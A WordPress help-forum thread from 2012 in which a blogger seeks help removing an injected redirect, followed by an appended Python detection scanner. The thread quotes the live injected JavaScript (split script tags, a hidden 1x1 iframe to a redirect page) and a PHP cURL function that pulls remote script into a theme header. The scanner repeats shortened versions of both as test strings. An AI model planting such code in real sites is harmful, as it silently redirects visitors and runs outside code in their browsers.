5:54 pm February 21, 2012 | This That And The MBA | Member | posts 240

Ok sometime over the past few days something happened to my site. Now there is a malware redirect.php somewhere on my site that sends you to adf.ly.
I have spent the last 2 days trying to learn code to no avail. I had the webhost remove something they thought last night but it turned out not to be the case. They said it is somewhere else and that I should contact my developer… Guess what, that is me!
So I am at a loss, I don't know what to do. My site seems to load that occasionally and sometimes it doesn't. It doesn't load it when you go in through Firefox but it does when through IE. I checked and there appears to be an adfly bot out there.
Any help or suggestions would be greatly appreciated! Below is the script. Thanks
<script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.smuss.net/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.smuss.net/jquery.js"></scr'+'ipt>'); } </script>
<script type="text/javascript">
document.write('<iframe src="http://smuss.net/redirect.php" width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></iframe>');

6:23 pm February 21, 2012 | Jeremy @ Personal Finance Whiz | Member | posts 174

Can you not just delete that snippet of code from your theme?

6:40 pm February 21, 2012 | This That And The MBA | Member | posts 240

I can't find that line of script in the theme. Any suggestions on where to look? If you go to the main site and click view source you can see that at around line 50.

7:11 pm February 21, 2012 | Forest Parks | Cairo, Egypt | Admin | posts 1337

Can your host just restore from a backup 2 days ago? If not it may need a full clean up and could be in every theme file. A couple of people (I think Jesse Michelson is one) here offer services cleaning up these kinds of messes. I would offer but I don't have time today I am afraid, it's nearing the end of the day here.

7:16 pm February 21, 2012 | This That And The MBA | Member | posts 240

If he is at PF Firewall I emailed him earlier. I haven't heard back from him yet.
Thanks for your suggestion.

7:43 am February 22, 2012 | Jackie | Member | posts 664

If you are using WordPress, I would look in Appearance > Editor and then click header.php. Based on what you've described, that seems like the most likely location for the snippet to me. Once you find it, you can remove it and click Update File at the bottom.

8:08 am February 22, 2012 | Charles @ MoneyGreenLife | Member | posts 318

I wonder how these malwares are installing themselves onto our blogs. How do we prevent them from happening all over again even after a fix?

8:27 am February 22, 2012 | Jeremy @ Personal Finance Whiz | Member | posts 174

If you don't see anything amiss in the header.php, check your functions.php.

9:03 am February 22, 2012 | This That And The MBA | Member | posts 240

I just went and spent the 90 bucks for sucuri.net and they are removing it. If I spent the past 2 nights messing with it and I couldn't figure it out, my time is worth the 90 bucks, also considering it comes with a year of protection. Ughh, it is a pain to deal with, and not understanding code too much, it could be buried anywhere.

9:40 am February 22, 2012 | FamilyMoneyValues | Member | posts 812

This is a very good question. Is WordPress more susceptible than other products to infestations?
Charles @ MoneyGreenLife said:
I wonder how these malwares are installing themselves onto our blogs. How do we prevent them from happening all over again even after a fix?

11:46 am February 22, 2012 | OneCentAtatime | Florida, USA | Member | posts 1778

WordPress is as vulnerable as any other software. But you increase the risk by installing various widgets and plugins. Always look for the star rating and reviews of a plugin before blindly installing it for the sake of trying new things out.
MBA, try to remember which plugins you installed lately and try removing plugins one by one, with the last one first.
You can FTP the content to your local desktop and search in files (any text editor does that) for the words "redirect" etc.
Any plugin with that kind of word is a suspect. Try to determine the plugin by seeing the file's folder structure or documentation within.

12:58 pm February 22, 2012 | jmichelsen | Moderator | posts 208

Hey Christopher, I haven't received your email but am happy to help. I just went to your site, saw your post about inmotion fixing the problem... then I got redirected to some weight-loss ad.
Is inmotion still working on the problem?
I've sent you an email.

1:04 pm February 22, 2012 | jmichelsen | Moderator | posts 208

OneCentAtatime said:
WordPress is as vulnerable as any other software. But you increase the risk by installing various widgets and plugins. Always look for the star rating and reviews of a plugin before blindly installing it for the sake of trying new things out.
MBA, try to remember which plugins you installed lately and try removing plugins one by one, with the last one first.
You can FTP the content to your local desktop and search in files (any text editor does that) for the words "redirect" etc.
Any plugin with that kind of word is a suspect. Try to determine the plugin by seeing the file's folder structure or documentation within.
WordPress in general isn't the issue, like OneCent said, but it's the plugins/themes that usually cause havoc. More specifically, if plugins and themes aren't kept up to date, or are coded badly, you're open to attacks. When a new release of a plugin/theme/WordPress core comes out, in the release notes, vulnerabilities that were patched are revealed, which makes the old version even more susceptible.

4:44 am February 23, 2012 | Smart Wealth | Michigan | Member | posts 304

Too bad you had to pay to get the problem resolved.

9:54 am February 23, 2012 | This That And The MBA | Member | posts 240

yah tell me about it… nothing more frustrating than trying to do something and it is beyond your comprehension… I know finance… computer language I was lost… it looked good to me but of course I didn't know what I was looking for… needless to say it is fixed after 3 long days… I should have just done it on day one… but I being me thought I'd try to fix it on my own… so I could pat myself on the back…
but I'm back up!!!!! wooo hooo

5:01 pm February 23, 2012 | OneCentAtatime | Florida, USA | Member | posts 1778

What actually is the root cause? Let us all know about it.

6:16 am February 24, 2012 | This That And The MBA | Member | posts 240

Sucuri.net removed it and spent about 10 hours working on it. They found that it was in the Thesis theme and the malware had somehow gotten installed in there. They reinstalled the theme but now it messed with the site, it removed some of the widgets and things I had. Better than having to start all over so that is what I will be doing this weekend. They also got rid of my Sociable Icons that I had installed to like or send to Twitter. I wrote a little write-up on my site yesterday about it.

1:36 pm April 18, 2012 | rstrode | Orlando, FL | Member | posts 5

Post edited 1:40 pm – April 18, 2012 by rstrode
There is a really good chance that code was located in the /lib/html/ folder within your theme, not WordPress itself, but the theme you were using. It is probably located in the header.php file within that folder. There are several header.php's in these kinds of themes, which makes taking it down a little bit of work, but possible. It could have also been labeled something else. However, that is a part of a header loop, they added it as a function. I have seen it done to many sites. It usually comes already included in the theme file or added later through an update. I have found this to be the case a few times helping friends out with their sites. I was a computer programmer before I decided to be a human programmer. So, they all ask me for help when they have issues.
I figured I would post this so that if anyone else has this issue they have a good place to start to track it down. Make sure to only delete the function. Below is an example from a friend's site.
if (function_exists('curl_init'))
{
$url = "http://www.j-query.org/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
The code you are looking for will look something like this, but may have a different link and it will fix your issue and your site will run a lot faster.
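
An added example, not part of any post in this thread: a small Python scanner for a downloaded copy of the site (the FTP-and-search approach suggested above) that flags the two injection patterns quoted in the thread instead of relying on a search for the word "redirect". The rule names, the trusted-host list and the file extensions are assumptions of this example.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Hosts allowed to serve jQuery: an assumption for this example, adjust per site.
TRUSTED_JQUERY_HOSTS = {"code.jquery.com", "ajax.googleapis.com"}
RULES = {
    # Script tag split into pieces so a plain search for "<script" misses it.
    "split-script-tag": re.compile(r"<scr['\"]\s*\+\s*['\"]ipt", re.I),
    # 1x1 (or 0x0) iframe: the invisible frame that carries the redirect.
    "hidden-iframe": re.compile(
        r"<iframe\b(?=[^>]*\bwidth=[\"']?[01][\"'\s>])"
        r"(?=[^>]*\bheight=[\"']?[01][\"'\s>])", re.I),
    # PHP that fetches a URL with cURL and echoes the response into the page.
    "curl-fetch-echo": re.compile(
        r"(\$\w+)\s*=\s*curl_exec\s*\(.*?\becho\s+[\"']?\1\b", re.I | re.S),
}
JQUERY_URL = re.compile(r"https?://[^\s\"'<>]+?/jquery[^\s\"'<>/]*\.js", re.I)

# Constructed test input, shortened from the two snippets quoted in the thread.
SAMPLE_JS = ("document.write('<scr'+'ipt src=\"http://www.smuss.net/jquery.js\">"
             "</scr'+'ipt>');\ndocument.write('<iframe src=\"http://smuss.net/"
             "redirect.php\" width=\"1\" height=\"1\" marginwidth=\"0\"></iframe>');")
SAMPLE_PHP = ('$url = "http://www.j-query.org/jquery-1.6.3.min.js";\n'
              "$ch = curl_init();\ncurl_setopt($ch, CURLOPT_URL, $url);\n"
              '$data = curl_exec($ch);\ncurl_close($ch);\necho "$data";')

def scan_text(text, trusted_hosts=TRUSTED_JQUERY_HOSTS):
    """Return the sorted names of the rules that fire on one file's contents."""
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    for url in JQUERY_URL.findall(text):
        if (urlparse(url).hostname or "").lower() not in trusted_hosts:
            hits.add("jquery-from-untrusted-host")
    return sorted(hits)

def scan_tree(root, exts=(".php", ".js", ".html", ".htm")):
    """Walk a downloaded copy of the site; map relative path -> rule names."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

if __name__ == "__main__":
    print(scan_text(SAMPLE_JS), scan_text(SAMPLE_PHP))
```

A hit is a lead for manual review, not proof of infection; `scan_tree` only reads files and never modifies them.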